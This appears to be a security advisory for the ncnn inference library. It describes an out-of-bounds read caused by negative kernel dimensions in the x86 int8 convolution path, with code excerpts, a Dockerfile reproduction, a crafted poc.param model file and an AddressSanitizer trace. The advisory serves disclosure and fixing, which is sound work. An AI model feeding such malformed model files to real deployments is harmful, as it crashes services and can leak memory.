Out-of-Bounds Read From Negative Kernel Dimensions
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/convolution_im2col_gemm_int8.h:823 in convolution_im2col_input_tile_int8_impl
Sanitizer verdict: unknown-crash
Summary
Convolution::load_param accepts negative kernel_w/kernel_h, and the x86 int8 im2col path uses them to derive both the output geometry and the byte offsets it loads from. A model with kernel_w=-100 and kernel_h=-1 makes the layer claim an output far larger than the input and issue 16-byte SIMD loads from offsets well past the end of the input tensor. ncnnoptimize reaches this while running shape inference over the attacker-supplied .param/.bin pair, and the process crashes.
Detail
The untrusted fields are param keys 1 and 11 (kernel_w, kernel_h) plus key 8 (int8_scale_term, which selects the int8 pipeline). Convolution::load_param stores them verbatim (kernel_w = pd.get(1, 0); kernel_h = pd.get(11, kernel_w);). Convolution_x86::forward_int8_x86 then computes the kernel extent and output size with plain signed arithmetic, and convolution_im2col_input_tile_int8_impl recomputes the same quantities before turning them into load offsets:
// src/layer/x86/convolution_x86.cpp:1021
const int kernel_extent_w = dilation_w * (kernel_w - 1) + 1;
const int kernel_extent_h = dilation_h * (kernel_h - 1) + 1;
int outw = (w - kernel_extent_w) / stride_w + 1;
int outh = (h - kernel_extent_h) / stride_h + 1;
// src/layer/x86/convolution_im2col_gemm_int8.h:749
const int kernel_extent_w = dilation_w * (kernel_w - 1) + 1;
const int outw = (w - kernel_extent_w) / stride_w + 1;
...
const int maxk = kernel_w * kernel_h;
// src/layer/x86/convolution_im2col_gemm_int8.h:820
__m128i _offset = _mm_add_epi32(_mm_set1_epi32(dxy_offset), _puv_offset);
__m128i _p0 = _mm_loadu_si128((const __m128i*)((const signed char*)bottom_blob + _mm_extract_epi32(_offset, 0)));
__m128i _p1 = _mm_loadu_si128((const __m128i*)((const signed char*)bottom_blob + _mm_extract_epi32(_offset, 1)));
The PoC uses a 16x1x1 int8 input with kernel_w=-100, kernel_h=-1, dilation=1, stride=1. The two negatives multiply back to a positive maxk = 100, so the reduction loop runs a hundred taps, while the extents go negative: kernel_extent_w = 1 * (-101) + 1 = -100 and kernel_extent_h = 1 * (-2) + 1 = -1. Subtracting a negative extent enlarges the output — outw = (16 + 100) / 1 + 1 = 117 and outh = (1 + 1) / 1 + 1 = 3 — so the im2col tiler is asked to gather 351 spatial positions from a tensor that holds 16 bytes.
The gather offsets are built from those inflated coordinates (_dx, _dy scaled by stride and w) plus the per-tap _puv_offset derived from maxk, kernel_w and the dilations; none of the inputs is validated against the actual input extent. The 16-byte _mm_loadu_si128 at line 823 lands 69 bytes into the 84-byte input allocation and reads through its end, which is what AddressSanitizer reports before ncnnoptimize dies.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-out-of-bounds-read-from-negative-kernel-dimensions && cd ncnn-poc-out-of-bounds-read-from-negative-kernel-dimensions
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
2 2
Input data 0 1 data 0=16 1=1
Convolution conv 1 1 data out 0=1 1=-100 6=100 8=1 11=-1
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x50e000000305 at pc 0x58839303ae39 bp 0x7ffdfcb301f0 sp 0x7ffdfcb301e0
READ of size 16 at 0x50e000000305 thread T0
#0 0x58839303ae38 in _mm_loadu_si128(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/emmintrin.h:706
#1 0x58839303ae38 in convolution_im2col_input_tile_int8_impl /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:823
#2 0x5883930531d5 in convolution_im2col_input_tile_int8 /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:2636
#3 0x588393125ccb in ncnn::convolution_im2col_input_tile_int8_avx512vnni(ncnn::Mat const&, ncnn::Mat&, int, int, int, int, int, int, int, int, int, int) /ncnn/src/layer/x86/convolution_x86_avx512vnni.cpp:23
#4 0x5883921fdee1 in convolution_im2col_input_tile_int8 /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:2599
#5 0x58839223962e in convolution_im2col_gemm_int8 /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:4601
#6 0x5883923e2f00 in ncnn::Convolution_x86_avx512::forward_int8_x86(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:1117
#7 0x5883923cc1af in ncnn::Convolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:543
#8 0x58839159af2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#9 0x58839158cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#10 0x5883915ec9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#11 0x58839147e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#12 0x5883914fbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#13 0x769b9df051c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#14 0x769b9df0528a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#15 0x58839147b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000314 is located 0 bytes after 84-byte region [0x50e0000002c0,0x50e000000314)
allocated by thread T0 here:
#0 0x769b9e57ef1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x58839151068e in fastMalloc /ncnn/src/allocator.h:62
#2 0x58839151068e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x58839154f4b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
#4 0x588396e6e391 in ncnn::Quantize_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/quantize_x86_avx512.cpp:342
#5 0x588391522da8 in ncnn::Layer_final::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer.cpp:366
#6 0x58839156715b in ncnn::quantize_to_int8(ncnn::Mat const&, ncnn::Mat&, ncnn::Mat const&, ncnn::Option const&) /ncnn/src/mat.cpp:2422
#7 0x5883923e1084 in ncnn::Convolution_x86_avx512::forward_int8_x86(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:1004
#8 0x5883923cc1af in ncnn::Convolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:543
#9 0x58839159af2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#10 0x58839158cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#11 0x5883915ec9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#12 0x58839147e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#13 0x5883914fbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#14 0x769b9df051c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#15 0x769b9df0528a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#16 0x58839147b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/emmintrin.h:706 in _mm_loadu_si128(long long __vector(2) const*)
Credit
Zheng Yu @ DepthFirst